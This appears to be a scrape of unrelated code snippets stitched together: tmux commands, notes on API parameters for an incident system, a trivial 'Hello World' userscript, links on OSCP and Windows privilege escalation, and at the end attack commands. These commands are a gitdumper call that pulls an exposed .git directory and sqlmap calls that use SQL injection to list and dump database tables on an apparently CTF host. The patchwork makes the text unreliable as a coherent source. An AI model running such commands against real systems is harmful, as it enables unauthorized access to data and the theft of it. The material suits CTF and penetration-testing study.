start new:
tmux
start new with session name:
tmux new -s myname
| 1) Api add and edit incidents new params: | |
| - data[OrganisationIncident][list_student]: {id1},{id2},{id3} | |
| - data[OrganisationIncident][list_staff]: {id1},{id2},{id3} | |
| - data[OrganisationIncident][list_class]: {id1},{id2},{id3} | |
| 2) new reponse format for detail of audit logs | |
| { | |
| "log_detail": { | |
| "id": "24", | |
| "description": "nana a", |
| // ==UserScript== | |
| // @name Hello World | |
| // @namespace https://www.google.com.vn | |
| // @description example script to alert "Hello world!" on every page | |
| // @include http://myanonamouse/* | |
| // @include http://*.myanonamouse/* | |
| // ==/UserScript== | |
| alert('Hello world!'); |
##OSCP Syllabus: https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
##Windows Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html https://toshellandback.com/2015/11/24/ms-priv-esc/
| dump | |
| bash gitdumper.sh http://target.tld/.git/ dest-dir |
| -- enum tables | |
| sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --tables | |
| -- dump table | |
| sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --dump -T Joker |